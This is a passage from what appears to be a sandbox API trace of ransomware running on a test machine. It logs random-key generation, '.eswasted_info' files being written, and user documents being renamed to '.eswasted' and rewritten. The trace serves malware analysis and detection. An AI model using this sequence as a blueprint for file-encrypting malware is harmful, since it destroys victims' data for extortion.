HALPmcxz\\Desktop\\Z88VY1b.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z88vy1b.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0074.047] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0074.049] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0074.050] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0074.050] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.050] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0074.051] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0074.051] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.060] SetEndOfFile (hFile=0x124) returned 1 [0074.062] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0074.062] CloseHandle (hObject=0x124) returned 1 [0074.064] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0074.064] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0074.065] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0074.065] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIoWUFykpVWrvA.mp3") returned 60 [0074.065] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x71aba0 [0074.065] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.065] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0074.065] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0074.066] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0074.066] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIoWUFykpVWrvA.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziowufykpvwrva.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.067] WriteFile (in: hFile=0x124, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.068] SetEndOfFile (hFile=0x124) returned 1 [0074.068] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.068] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0074.068] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIoWUFykpVWrvA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziowufykpvwrva.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIoWUFykpVWrvA.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziowufykpvwrva.mp3.eswasted")) returned 1 [0074.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIoWUFykpVWrvA.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziowufykpvwrva.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0074.069] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0074.070] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0074.070] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0074.070] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.070] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0074.071] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0074.071] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.111] SetEndOfFile (hFile=0x124) returned 1 [0074.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.113] CloseHandle (hObject=0x124) returned 1 [0074.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0074.115] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0074.115] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0074.115] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0074.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7e-9HIkeZJR.docx") returned 60 [0074.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x71aba0 [0074.116] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0074.116] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0074.116] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0074.116] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0074.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7e-9HIkeZJR.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7e-9hikezjr.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.130] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.131] SetEndOfFile (hFile=0x124) returned 1 [0074.131] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.131] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7e-9HIkeZJR.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7e-9hikezjr.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7e-9HIkeZJR.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7e-9hikezjr.docx.eswasted")) returned 1 [0074.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7e-9HIkeZJR.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7e-9hikezjr.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0074.132] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0074.135] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0074.136] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.136] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.136] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0074.136] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0074.136] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.145] SetEndOfFile (hFile=0x124) returned 1 [0074.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.147] CloseHandle (hObject=0x124) returned 1 [0074.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0074.148] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0074.149] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0074.149] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.149] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7eErZYytfPAis.docx") returned 62 [0074.149] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x286) returned 0x71aba0 [0074.149] lstrcpyW (in: lpString1=0x71ac1c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.149] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0074.149] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0074.150] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0074.150] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7eErZYytfPAis.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7eerzyytfpais.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.179] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.180] SetEndOfFile (hFile=0x124) returned 1 [0074.577] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.577] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.577] lstrcpyW (in: lpString1=0x71ac1c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7eErZYytfPAis.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7eerzyytfpais.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7eErZYytfPAis.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7eerzyytfpais.docx.eswasted")) returned 1 [0074.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7eErZYytfPAis.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7eerzyytfpais.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.581] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0074.584] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0074.595] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.595] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.595] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0074.596] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0074.596] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.608] SetEndOfFile (hFile=0x124) returned 1 [0074.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.610] CloseHandle (hObject=0x124) returned 1 [0074.612] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0074.612] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0074.613] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0074.613] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\3UyY1on2AU9_vHY-D0Js.pdf") returned 73 [0074.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29c) returned 0x6f5cc0 [0074.613] lstrcpyW (in: lpString1=0x6f5d52, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0074.613] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0074.614] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0074.614] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\3UyY1on2AU9_vHY-D0Js.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\3uyy1on2au9_vhy-d0js.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.790] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.791] SetEndOfFile (hFile=0x11c) returned 1 [0074.792] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.792] lstrcpyW (in: lpString1=0x6f5d52, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\3UyY1on2AU9_vHY-D0Js.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\3uyy1on2au9_vhy-d0js.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\3UyY1on2AU9_vHY-D0Js.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\3uyy1on2au9_vhy-d0js.pdf.eswasted")) returned 1 [0074.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\3UyY1on2AU9_vHY-D0Js.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\3uyy1on2au9_vhy-d0js.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0074.792] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0074.793] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0074.794] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.794] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.794] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0074.795] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0074.795] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.803] SetEndOfFile (hFile=0x11c) returned 1 [0074.805] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.805] CloseHandle (hObject=0x11c) returned 1 [0075.336] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0075.336] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.337] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.337] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\MRasqMwY.odt") returned 76 [0075.337] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x6f5cc0 [0075.337] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.337] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.337] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.338] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.338] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\MRasqMwY.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\mrasqmwy.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.339] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.339] SetEndOfFile (hFile=0x124) returned 1 [0075.340] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.340] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.340] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\MRasqMwY.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\mrasqmwy.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\MRasqMwY.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\mrasqmwy.odt.eswasted")) returned 1 [0075.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\MRasqMwY.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\mrasqmwy.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.341] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.341] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.342] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.342] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.342] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.342] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.342] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.351] SetEndOfFile (hFile=0x124) returned 1 [0075.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.353] CloseHandle (hObject=0x124) returned 1 [0075.359] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0075.359] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.360] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.360] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\Fw8StRX8z_Nc7vd2tH.pptx") returned 112 [0075.360] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ea) returned 0x71ec18 [0075.360] lstrcpyW (in: lpString1=0x71ecf8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.360] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.360] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.361] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.361] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\Fw8StRX8z_Nc7vd2tH.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\fw8strx8z_nc7vd2th.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.361] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.362] SetEndOfFile (hFile=0x124) returned 1 [0075.363] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, 